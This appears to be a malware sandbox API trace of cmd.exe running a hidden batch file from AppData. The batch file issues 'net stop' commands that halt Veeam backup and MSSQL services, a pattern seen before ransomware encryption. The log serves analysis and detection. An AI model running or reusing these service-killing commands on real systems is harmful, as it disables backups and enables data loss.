[0200.188] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.188] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0200.188] GetProcessHeap () returned 0x3e0000 [0200.188] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.188] GetEnvironmentStringsW () returned 0x3f8408* [0200.188] GetProcessHeap () returned 0x3e0000 [0200.188] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.188] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.188] GetProcessHeap () returned 0x3e0000 [0200.188] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0200.188] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0200.188] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.189] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0200.189] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.189] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0200.189] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.189] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0200.189] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.189] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0200.190] SetConsoleInputExeNameW () returned 0x1 [0200.190] GetConsoleOutputCP () returned 0x1b5 [0200.190] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0200.190] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0200.190] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0200.190] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.190] SetFilePointer (in: hFile=0x78, lDistanceToMove=3012, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbc4 [0200.190] GetProcessHeap () returned 0x3e0000 [0200.190] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0200.190] GetProcessHeap () returned 0x3e0000 [0200.190] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0200.190] GetProcessHeap () returned 0x3e0000 [0200.190] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0200.190] GetProcessHeap () returned 0x3e0000 [0200.190] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0200.190] GetProcessHeap () returned 0x3e0000 [0200.190] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0200.190] GetProcessHeap () returned 0x3e0000 [0200.190] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0200.190] GetProcessHeap () returned 0x3e0000 [0200.190] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0200.190] GetProcessHeap () returned 0x3e0000 [0200.190] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0200.191] GetProcessHeap () returned 0x3e0000 [0200.191] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0200.191] GetProcessHeap () returned 0x3e0000 [0200.191] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0200.191] GetProcessHeap () returned 0x3e0000 [0200.191] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0200.191] GetProcessHeap () returned 0x3e0000 [0200.191] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0200.191] GetProcessHeap () returned 0x3e0000 [0200.191] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0200.191] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.191] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbc4 [0200.191] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xcfd, lpOverlapped=0x0) returned 1 [0200.191] SetFilePointer (in: hFile=0x78, lDistanceToMove=3065, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbf9 [0200.191] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=53, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥ /y\r\nures\r\nnded\r\n") returned 53 [0200.191] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.191] GetFileType (hFile=0x78) returned 0x1 [0200.191] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.192] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbf9 [0200.192] GetProcessHeap () returned 0x3e0000 [0200.192] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0200.192] GetProcessHeap () returned 0x3e0000 [0200.192] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0200.195] _tell (_FileHandle=3) returned 3065 [0200.195] _close (_FileHandle=3) returned 0 [0200.195] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0200.195] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0200.195] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0200.195] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0200.195] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0200.195] _wcsicmp (_String1="net", _String2="CD") returned 11 [0200.195] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0200.195] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0200.195] _wcsicmp (_String1="net", _String2="REN") returned -4 [0200.195] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0200.195] _wcsicmp (_String1="net", _String2="SET") returned -5 [0200.195] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0200.195] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0200.195] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0200.195] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0200.195] _wcsicmp (_String1="net", _String2="MD") returned 1 [0200.195] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0200.195] _wcsicmp (_String1="net", _String2="RD") returned -4 [0200.195] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0200.195] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0200.195] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0200.195] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0200.195] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0200.196] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0200.196] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0200.196] _wcsicmp (_String1="net", _String2="VER") returned -8 [0200.196] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0200.196] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0200.196] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0200.196] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0200.196] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0200.196] _wcsicmp (_String1="net", _String2="START") returned -5 [0200.196] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0200.196] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0200.196] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0200.196] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0200.196] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0200.196] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0200.196] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0200.196] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0200.196] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0200.196] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0200.196] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0200.196] SetErrorMode (uMode=0x0) returned 0x1 [0200.196] GetProcessHeap () returned 0x3e0000 [0200.196] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0200.197] GetProcessHeap () returned 0x3e0000 [0200.197] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0200.197] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.197] GetProcessHeap () returned 0x3e0000 [0200.197] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0200.197] GetProcessHeap () returned 0x3e0000 [0200.197] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0200.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.198] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.198] GetLastError () returned 0x2 [0200.198] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.198] GetLastError () returned 0x2 [0200.199] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.199] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.199] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.200] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.200] GetLastError () returned 0x2 [0200.200] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.200] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.201] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.201] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0200.201] SetErrorMode (uMode=0x0) returned 0x1 [0200.201] GetProcessHeap () returned 0x3e0000 [0200.201] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0200.201] GetProcessHeap () returned 0x3e0000 [0200.201] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0200.202] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.202] GetProcessHeap () returned 0x3e0000 [0200.202] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0200.202] GetProcessHeap () returned 0x3e0000 [0200.202] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0200.202] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.202] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.203] GetLastError () returned 0x2 [0200.203] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.203] GetLastError () returned 0x2 [0200.203] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.204] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0200.204] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.204] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.204] GetLastError () returned 0x2 [0200.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0200.205] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.205] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.205] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0200.205] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0200.206] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0200.206] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0200.206] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xb0c, dwThreadId=0x720)) returned 1 [0200.210] CloseHandle (hObject=0x78) returned 1 [0200.210] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0200.210] GetProcessHeap () returned 0x3e0000 [0200.210] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.210] GetEnvironmentStringsW () returned 0x3f8408* [0200.210] GetProcessHeap () returned 0x3e0000 [0200.210] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.210] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.210] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0200.366] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0200.366] CloseHandle (hObject=0x74) returned 1 [0200.366] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0200.366] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0200.366] GetProcessHeap () returned 0x3e0000 [0200.366] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.366] GetEnvironmentStringsW () returned 0x3f8408* [0200.366] GetProcessHeap () returned 0x3e0000 [0200.366] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.367] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.367] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0200.367] GetProcessHeap () returned 0x3e0000 [0200.367] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.367] GetEnvironmentStringsW () returned 0x3f8408* [0200.367] GetProcessHeap () returned 0x3e0000 [0200.367] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.367] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.367] GetProcessHeap () returned 0x3e0000 [0200.367] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0200.367] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0200.367] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.367] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0200.368] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.368] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0200.368] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.368] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0200.368] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.368] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0200.368] SetConsoleInputExeNameW () returned 0x1 [0200.368] GetConsoleOutputCP () returned 0x1b5 [0200.368] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0200.369] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.369] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0200.369] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0200.369] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.369] SetFilePointer (in: hFile=0x74, lDistanceToMove=3065, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbf9 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f0ee0 | out: hHeap=0x3e0000) returned 1 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0200.369] GetProcessHeap () returned 0x3e0000 [0200.369] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0200.370] GetProcessHeap () returned 0x3e0000 [0200.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0200.370] GetProcessHeap () returned 0x3e0000 [0200.370] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0200.370] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.370] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbf9 [0200.370] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xcc8, lpOverlapped=0x0) returned 1 [0200.370] SetFilePointer (in: hFile=0x74, lDistanceToMove=3098, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc1a [0200.370] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$SBSMONITORING /y\r\nData ServiceΓÇ¥ /y\r\nures\r\nnded\r\n") returned 33 [0200.370] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.370] GetFileType (hFile=0x74) returned 0x1 [0200.370] _get_osfhandle (_FileHandle=3) returned 0x74 [0200.370] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc1a [0200.370] GetProcessHeap () returned 0x3e0000 [0200.370] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0200.370] GetProcessHeap () returned 0x3e0000 [0200.371] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0200.374] _tell (_FileHandle=3) returned 3098 [0200.374] _close (_FileHandle=3) returned 0 [0200.374] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0200.374] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0200.374] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0200.374] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0200.374] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0200.374] _wcsicmp (_String1="net", _String2="CD") returned 11 [0200.374] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0200.374] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0200.374] _wcsicmp (_String1="net", _String2="REN") returned -4 [0200.374] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0200.374] _wcsicmp (_String1="net", _String2="SET") returned -5 [0200.374] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0200.374] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0200.374] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0200.374] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0200.374] _wcsicmp (_String1="net", _String2="MD") returned 1 [0200.374] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0200.374] _wcsicmp (_String1="net", _String2="RD") returned -4 [0200.374] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0200.374] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0200.374] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0200.374] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0200.374] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0200.374] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0200.374] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0200.374] _wcsicmp (_String1="net", _String2="VER") returned -8 [0200.374] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0200.375] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0200.375] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0200.375] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0200.375] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0200.375] _wcsicmp (_String1="net", _String2="START") returned -5 [0200.375] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0200.375] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0200.375] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0200.375] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0200.375] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0200.375] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0200.375] _wcsicmp 